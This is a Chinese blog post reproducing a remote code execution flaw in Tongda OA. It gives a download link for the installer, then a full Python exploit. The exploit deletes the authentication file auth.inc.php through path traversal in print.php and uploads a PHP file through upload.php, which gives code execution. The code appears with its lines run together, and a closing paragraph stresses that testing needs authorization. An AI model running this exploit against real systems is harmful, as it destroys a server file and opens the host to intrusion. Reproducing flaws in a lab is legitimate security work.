通达oa 不允许从该ip登陆_通达OA RCE复现

安装

下载通达OA安装包进行安装。

下载链接：

链接: https://pan.baidu.com/s/1tSuxT3N2zdEPwGH07-pmRw 密码: t9s3

安装完成后会自动打开页面。

漏洞利用

# _*_ coding utf-8 _*_# author:return0;import requeststarget="http://10.211.55.5"payload="<?php echo HelloWorld ?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:    print("[-]Failed to deleted auth.inc.php")    exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('hack.php', payload)}requests.post(url=url,files=files)url=target+"/_hack.php"page=requests.get(url=url).textif 'No input file specified.' not in page:    print("[+]Filed Uploaded Successfully")    print("[+]URL:",url)else:    print("[-]Failed to upload file")

然后运行此代码

使用浏览器打开链接即可复现成功，该漏洞在实际安服渗透验证复现时需通知客户做好备份。安服仔在验证时不需要删除auth.inc.php文件，自行编写脚本验证该文件存在且OA版本为11.6即可证明存在此漏洞。网络不是法外之地，渗透测试需在得到客户充分授权并告知客户风险的情况下开展。